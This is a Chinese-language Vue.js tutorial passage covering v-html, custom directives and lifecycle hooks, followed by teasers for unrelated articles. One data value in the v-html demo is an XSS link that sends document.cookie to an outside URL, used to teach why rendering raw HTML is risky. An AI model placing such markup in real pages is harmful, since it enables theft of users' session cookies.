        <div v-html="str2"></div>
        <h1 v-cloak>{{name}}</h1>
        <hr>
        <h1 v-once>原始n的值:{{n}}</h1>
        <h1>当前n的值:{{n}}</h1>
        <button @click="n++">n++</button>
    </div>
</body>
<script src="../js/vue.js"></script>
<script>
 new Vue({
    el:"#root",
    data:{
    	n:1,
        msg:"hello world",
        str1:"<h1>hello 蓝朽</h1>",
        str2:"<a href=javascript:location.href='https://www.baidu.com?'+document.cookie>快来点我!</a>"
    }
 })
</script>
</html>

十六、自定义指令

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!--
        需求1:定义个v-big指令, 和v-text功能 类似,但会把绑定的数值放大10倍。
        需求2:定义个v-fbind指令,和v-bind功能类似,但可以让其所绑定的input元素默认获取焦点。
        自定义指令总结:
            定义语法:
            (1)局部指令:
                new Vue({
                    directives:{指令名:配置对象}
                })或
                new Vue({
                    directives:{指令名:函数}
                })
            (2).全局指令:
                Vue.directive(指令名,配置对象)或Vue.directive(指令名,回调函数)
            二、
            配置对象中常用的3个回调:
                (1).bind:指令与元素成功绑定时调用。
                (2).inserted:指令所在元素被插入页面时调用。
                (3).update:指令所在模板结构被重新解析时调用。
            三、备注:
                1.指令定义时不加V-,但使用时要加V-;
                2.指令名如果是多个单词,要使用kebab-case命名方式,不要用camelCase命名。

    -->
    <div id="root">
        <h2>当前n的值是:<span v-text="n"></span></h2>
        <h2>放大10倍后n的值为:<span v-big="n"></span></h2>
        <button @click="n++">点我n+1</button>
        <hr>
        <input type="text" v-fbind:value="n">
    </div>
    <div id="root2">
        <input type="text" v-fbind:value="x">
    </div>
</body>
<script src="../js/vue.js"></script>
<script>
    //全局自定义指令
    Vue.directive('fbind',{
                //指令与元素成功绑定时(一上来)
                bind(element,binding){
                    console.log(this)//注意,此处的this时window
                    element.value = binding.value;
                },
                //指令所在元素被插入页面时,只在初始化页面时执行
                inserted(element,binding){
                    console.log('inserted');
                    element.focus();
                },
                //指令所在的模板被重新解析时。
                update(element,binding){
                    console.log(binding)
                    element.value = binding.value;
                }

            })
    new Vue({
        el:"#root",
        data:{
            n:1
        },
        //局部自定义指令,1.指令与元素成功绑定时(一上来)。2.指令所在的模板被重新解析时。
        //element:标签,binding:标签里的信息
        directives:{
            big(element,binding){
                console.log(element,binding);
                element.innerText = binding.value*10;
            },
            fbind:{
                //指令与元素成功绑定时(一上来)
                bind(element,binding){
                    console.log(this)//注意,此处的this时window
                    element.value = binding.value;
                },
                //指令所在元素被插入页面时,只在初始化页面时执行
                inserted(element,binding){
                    console.log('inserted');
                    element.focus();
                },
                //指令所在的模板被重新解析时。
                update(element,binding){
                    console.log(binding)
                    element.value = binding.value;
                }

            }
        }
    })
    new Vue({
        el:"#root2",
        data:{
            x:1
        },
    })
</script>
</html>

十七、生命周期

在这里插入图片描述

生命周期:

  1. 又名:生命周期回调函数、生命周期函数、生命周期钩子。
  2. 是什么:Vue在关键时刻帮我们调用的一些特殊名称的函数。
  3. 生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
  4. 生命周期函数中的this指向是vm或组件实例对象。
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="root">
        <h2>当前n的值:{{n}}</h2>
        <button @click="add">n++</button>
        <button @click="bye">点我销毁vm</button>
    </div>
</body>
<script src="../js/vue.js"></script>
<script>
    const vm = new Vue({
        el:"#root",
        data:{
            n:1
        },
        methods: {
            add(){
                this.n++;
            },
            bye(){
                console.log("bye");
                this.$destroy()
            }
        },
        //此时:无法通过vm访问到data中的数据、methods中的方法。
        beforeCreate() {
            console.log("beforeCreate")
            // console.log(this);
            // debugger;
        },
        //此时:可以通过vm访问到data中的数据、methods中配置的方法。
        created() {
            console.log("created");
        },
        /*此时:
            1.页而呈现的是未经Vue编译的DOM结构。
            2.所有对DOM的操作,最终都不奏效。
        */  
        beforeMount() {
            console.log("beforeMount");
        },
        /*
        此时:
            1.页面中呈现的是经过Vue编译的DOM。
            2.对DOM的操作均有效(尽可能避免)。
            至此初始化过程结束,-般在此进行:开启
            定时器、发送网络请求、订阅消息、绑定自
            定义事件、等初始化操作。
        */
        mounted() {
            console.log("mounted");
        },
        /*
        此时:数据是新的,但页面是旧的,即:页面尚未和数据保持同步
        */
        beforeUpdate() {
            console.log("beforeUpdate");
        },
         /*
        此时:数据是新的,页面也是新的,即:页面和数据保持同步。
        */
        updated() {
            console.log("updated");
        },
         /*
        此时: vm中所有的: data、 methods、 指令
        等等,都处于可用状态,马上要执行销毁过程,
        一般在此阶段:关闭定时器、取消订阅消息、解绑自定义事件等收尾操作 
        */
        beforeDestroy() {
            console.log("beforeDestroy");
        },
        /*
        完全销毁
        */
        destroyed() {
            console.log("destroyed");
        },
        
    })
</script>
</html>

总结:
常用的生命周期钩子:

  1. mounted:发送ajax请求、 启动定时器、绑定自定义事件、订阅消息等[初始化操作]。
  2. beforeDestroy:清除定时器、解绑自定义事件、取消订阅消息等[收尾工作]。
    关于销毁Vue实例
  3. 销毁后借助Vue开发者工具看不到任何信息。
  4. 销毁后自定义事件会失效,但原生DOM事件依然有效。
  5. 一般不会 再beforeDestroy操作 数据,因为即便操作数据,也不会再触发更新流程了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/624699.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【大数据之路2】分布式文件系统 HDFS

2. 分布式文件系统 HDFS 1. 引入HDFS【面试点】2. HDFS 概述1. HDFS 设计思路2. HDFS 架构3. HDFS 优缺点 3. HDFS 操作HDFS 读写基准测试 1. HDFS Shell 操作【重点】2. HDFS API 操作1. 访问数据1. 获取 FileSystem2. 文件的遍历3. 创建文件夹4. 文件的上传5. 文件的下载 2. …

实验篇(7.2) 07. 通过安全隧道访问指定网站 (FortiClient-SSL) ❀ 远程访问

【简介】通过前面的实验&#xff0c;我们已经了解了SSL VPN的隧道模式。FortiClient客户端拨号后&#xff0c;访问服务器IP的流量&#xff0c;会通过安全隧道到达远端防火墙&#xff0c;并访问DMZ接口下的服务器。那如果我想让更多的访问走安全隧道&#xff0c;但是又不确定是哪…

win11 安装tesseract-ocr

1. OCR OCR&#xff0c;即Optical Character Recognition&#xff0c;光学字符识别&#xff0c;是指通过扫描字符&#xff0c;然后通过其形状将其翻译成电子文本的过程。对于图形验证码来说&#xff0c;它们都是一些不规则的字符&#xff0c;这些字符确实是由字符稍加扭曲变换…

【P52 】JMeter 汇总图(Aggregate Graph)

文章目录 一、汇总图&#xff08;Aggregate Graph&#xff09;参数说明二、准备工作三、测试计划设计 一、汇总图&#xff08;Aggregate Graph&#xff09;参数说明 可以以图形的方式查看事务或者取样器的汇总报告 使用场景&#xff1a;用于评估测试结果 使用频率&#xff1…

Linux——安装Xshell7并使用vim操作文件(vim常用操作+快捷键+踩坑总结)

一、安装Xshell7完成远程登录 由于在安装Xshell6的时候很容易会出现&#xff0c;要求更新&#xff0c;但同时又显示已经是最新的版本的问题。当然出现这个问题的解决方法有很多&#xff0c;但最简单的方法就是直接使用Xshell7版本。实际测试后发现可以正常使用。&#xff08;关…

6个令大喵惊喜的 Python 库

6个令大喵惊喜的 Python 库 在过去的两年里&#xff0c;我一直在广泛使用Python。因此&#xff0c;我一直在寻找令人惊叹的库&#xff0c;可以增强我在数据工程和商业智能项目中的工作。 1.Pendulum Python 中有许多库可用于日期时间&#xff0c;但我发现 Pendulum 在日期的任何…

ChatGPT 使用 拓展资料:吴恩达大咖 Building Systems with the ChatGPT API 链式提示

ChatGPT 使用 拓展资料:吴恩达大咖 Building Systems with the ChatGPT API 链式提示 在本视频中,我们将学习如何通过将多个提示链接在一起,将复杂的任务拆分为一系列更简单的子任务。你可能会想,为什么要将一个任务拆分为多个提示,而你可以像我们在上一个视频中学到的那样…

高级IO -- 多路转接之 select

高级IO – 多路转接之 select 文章目录 高级IO -- 多路转接之 select初识selectselect 函数原型关于fd_set结构 select使用示例编写Sock编写selectService测试 理解select执行过程socket就绪条件读就绪写就绪 select的特点select的缺点select的缺点 初识select 系统提供select…

2023同为测试你的薪资为何比别人低?

软件测试这个行业我见过工作5年依然是初级水平的功能测试&#xff0c;拿着不到1W的薪资&#xff0c;也见过1年时间达到高级自动化水平的大牛&#xff01;拿着20K的薪资。 影响你薪资的有两点&#xff01; 一、你的技术水平高低直接决定你薪资的多少&#xff0c;工作时间长短并…

3D引擎和渲染

常见的三维引擎 三维引擎按平台可分为客户端三维引擎&#xff0c;Web端三维引擎&#xff1b;按用途可分为游戏三维引擎、CAD/CAM/CAE三维引擎&#xff1b; 游戏引擎常见的有UE4、Unity3D&#xff1b;CAD工程用的三维引擎又分商用的还有开源的&#xff0c;商用的比较著名的有A…

华为OD-2023B卷-太阳能板最大面积(java)

2.华为OD-2023B卷 -太阳能板最大面积(回到目录) 太阳能板最大面积 知识点分治 时间限制:1s 空间限制:32MB 限定语言:不限 难度:★★ 中规中矩的双指针题目。暴力for循环过不了全部样例。 题目描述: 给航天器一侧加装长方形或正方形的太阳能板(图中的红色斜线区域),需…

uniapp请求封装入门级实战记录

简单记录一下uniapp请求进行封装的相关内容,方便以后查看! 1.目录结构 2.封装文件 2.1 全局公共方法封装 2.2 请求方法封装 2.3 项目请求路径封装 2.4 常用变量封装 2.5 页面使用 1.目录结构 项目根目录下创建common文件夹,包含内容: …

springBoot源码分析如何加载配置文件

前言&#xff1a;springBoot的版本是 2.2.4.RELEASE 一、入口 /*** Run the Spring application, creating and refreshing a new* {link ApplicationContext}.* param args the application arguments (usually passed from a Java main method)* return a running {link A…

DM5加密

MD5加密 概述 MD5&#xff08;Message Digest Algorithm 5&#xff09;是一种常用的哈希函数&#xff0c;能够将任意长度的消息压缩成一个128位的哈希值。它由Ronald Rivest在1991年设计&#xff0c;其设计目标是用来取代较早的MD4算法。 MD5算法通过多次处理分组数据来生成…

2023年5月青少年机器人技术等级考试理论综合试卷(三级)

青少年机器人技术等级考试理论综合试卷&#xff08;三级&#xff09;2023.06 分数&#xff1a; 100 题数&#xff1a; 30 一、 单选题(共 20 题&#xff0c; 共 80 分) 1.如图所示电路&#xff0c; 下列说法正确的是&#xff1f; &#xff08; &#xff09; A.电路中电阻 R3 和…

Kafka有几种消费者分区分配策略?

Range范围分配策略 Range范围分配策略是Kafka默认的分配策略&#xff0c;它可以确保每个消费者消费的分区数量是均衡的。 注意&#xff1a;Rangle范围分配策略是针对每个Topic的。 配置 配置消费者的partition.assignment.strategy为org.apache.kafka.clients.consumer.Ran…

JMeter如何从数据库中获取数据并作为变量使用?

目录 前言 1、JMeter连接MySQL数据库 2、线程组下新建一个 JDBC Connection Configuration 配置元件 3、实现数据库的查询-单值引用 4、实现数据库的查询-多值引用 总结&#xff1a; 前言 JMeter如何从数据库中获取数据并作为变量使用&#xff1f;这在我们使用JMeter做接…

Selenium Python教程第5章

5. 等待页面加载完成(Waits) 现在的大多数的Web应用程序是使用AJAX技术。当一个页面被加载到浏览器时&#xff0c;该页面内的元素可以在不同的时间点被加载。这使得定位元素变得困难。如果元素不再页面之中&#xff0c;会抛出 ElementNotVisibleException 异常。 使用 waits功能…

蓝桥杯单片机定时器不够用?PCA大力助你测距超声波!

在国赛的练习中遇到了定时器不够用的问题&#xff0c;也在网上有查阅到许多蓝桥杯单片机的用PCA定时器测距超声波的例子&#xff0c;但在移植实践运用了几个人的代码后总是各种各样的的问题不好用&#xff0c;因此深感有必要自己好好研究下&#xff0c;终于在一番摸爬中写出了用…

Shapr3d建模制图软件大学生教育优惠免费1年申请教程

前言介绍 shapr3d是iOS系统上一款专业的3D建模App&#xff0c;目前已经有window版本&#xff0c;主要搭配iPad Pro与Apple Pencil使用&#xff0c;它的特点是易学、方便与专业。我们可以使用它可以在几分钟内就可以把草图上的想法变成设计图。 从工程项目到珠宝设计&#xff…